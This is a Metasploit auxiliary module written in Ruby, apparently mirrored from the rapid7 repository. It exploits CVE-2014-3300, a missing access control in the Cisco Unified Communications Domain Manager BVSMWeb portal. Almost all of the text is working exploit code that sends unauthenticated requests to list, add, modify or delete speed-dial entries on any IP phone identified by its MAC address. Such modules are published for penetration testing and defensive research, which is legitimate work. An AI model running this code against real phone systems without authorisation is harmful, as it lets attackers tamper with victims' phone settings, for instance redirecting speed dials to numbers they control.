Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb
19852 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'rexml/document'

7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',

16
        'Description' => %q{

17
          The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager

18
          (CDM), before version 10, doesn't implement access control properly, which allows remote

19
          attackers to modify user information. This module exploits the vulnerability to make

20
          unauthorized speed dial entity manipulations.

21
        },

22
        'Author' => 'fozavci',

23
        'References' => [

24
          ['CVE', '2014-3300'],

25
          ['BID', '68331']

26
        ],

27
        'License' => MSF_LICENSE,

28
        'Actions' => [

29
          [ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],

30
          [ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],

31
          [ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],

32
          [ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]

33
        ],

34
        'DefaultAction' => 'List',

35
        'Notes' => {

36
          'Stability' => [CRASH_SAFE],

37
          'SideEffects' => [IOC_IN_LOGS],

38
          'Reliability' => []

39
        }

40
      )

41
    )

42


43
    register_options(

44
      [

45
        OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),

46
        OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),

47
        OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),

48
        OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),

49
        OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),

50
      ]

51
    )

52
  end

53


54
  def run

55
    case action.name.upcase

56
    when 'MODIFY'

57
      modify

58
    when 'DELETE'

59
      delete

60
    when 'ADD'

61
      add

62
    when 'LIST'

63
      list

64
    end

65
  end

66


67
  def send_rcv(uri, vars_get)

68
    uri = normalize_uri(target_uri.to_s, uri.to_s)

69
    res = send_request_cgi(

70
      {

71
        'uri' => uri,

72
        'method' => 'GET',

73
        'vars_get' => vars_get

74
      }

75
    )

76


77
    if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/

78
      return Exploit::CheckCode::Vulnerable, res

79
    end

80


81
    print_error('Target appears not vulnerable!')

82
    return Exploit::CheckCode::Safe, res

83
  end

84


85
  def parse(res)

86
    doc = REXML::Document.new(res.body)

87
    names = []

88
    phones = []

89


90
    list = doc.root.get_elements('DirectoryEntry')

91
    list.each do |lst|

92
      xlist = lst.get_elements('Name')

93
      xlist.each { |l| names << (l[0]).to_s }

94
      xlist = lst.get_elements('Telephone')

95
      xlist.each { |l| phones << (l[0]).to_s }

96
    end

97


98
    if names.empty?

99
      print_status('No Speed Dial detected')

100
      return

101
    end

102


103
    names.size.times do |i|

104
      info = ''

105
      info << "Position: #{names[i].split(':')[0]}, "

106
      info << "Name: #{names[i].split(':')[1]}, "

107
      info << "Telephone: #{phones[i]}"

108


109
      print_good(info.to_s)

110
    end

111
  end

112


113
  def list

114
    mac = datastore['MAC']

115


116
    print_status('Getting Speed Dials of the IP phone')

117
    vars_get = {

118
      'device' => "SEP#{mac}"

119
    }

120


121
    status, res = send_rcv('speeddials.cgi', vars_get)

122
    parse(res) unless status == Exploit::CheckCode::Safe

123
  end

124


125
  def add

126
    mac = datastore['MAC']

127
    name = datastore['NAME']

128
    position = datastore['POSITION']

129
    telno = datastore['TELNO']

130


131
    print_status('Adding Speed Dial to the IP phone')

132
    vars_get = {

133
      'name' => name.to_s,

134
      'telno' => telno.to_s,

135
      'device' => "SEP#{mac}",

136
      'entry' => position.to_s,

137
      'mac' => mac.to_s

138
    }

139
    status, res = send_rcv('phonespeedialadd.cgi', vars_get)

140


141
    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/

142
      print_good("Speed Dial #{position} is added successfully")

143
    elsif res && res.body && res.body.to_s =~ /exist/

144
      print_error('Speed Dial is exist, change the position or choose modify!')

145
    else

146
      print_error("Speed Dial couldn't add!")

147
    end

148
  end

149


150
  def delete

151
    mac = datastore['MAC']

152
    position = datastore['POSITION']

153


154
    print_status('Deleting Speed Dial of the IP phone')

155


156
    vars_get = {

157
      'entry' => position.to_s,

158
      'device' => "SEP#{mac}"

159
    }

160


161
    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

162


163
    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/

164
      print_good("Speed Dial #{position} is deleted successfully")

165
    else

166
      print_error('Speed Dial is not found!')

167
    end

168
  end

169


170
  def modify

171
    mac = datastore['MAC']

172
    name = datastore['NAME']

173
    position = datastore['POSITION']

174
    telno = datastore['TELNO']

175


176
    print_status('Deleting Speed Dial of the IP phone')

177


178
    vars_get = {

179
      'entry' => position.to_s,

180
      'device' => "SEP#{mac}"

181
    }

182


183
    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

184


185
    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/

186
      print_good("Speed Dial #{position} is deleted successfully")

187
      print_status('Adding Speed Dial to the IP phone')

188


189
      vars_get = {

190
        'name' => name.to_s,

191
        'telno' => telno.to_s,

192
        'device' => "SEP#{mac}",

193
        'entry' => position.to_s,

194
        'mac' => mac.to_s

195
      }

196


197
      status, res = send_rcv('phonespeedialadd.cgi', vars_get)

198


199
      if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/

200
        print_good("Speed Dial #{position} is added successfully")

201
      elsif res && res.body =~ /exist/

202
        print_error('Speed Dial is exist, change the position or choose modify!')

203
      else

204
        print_error("Speed Dial couldn't add!")

205
      end

206
    else

207
      print_error('Speed Dial is not found!')

208
    end

209
  end

210
end

211


212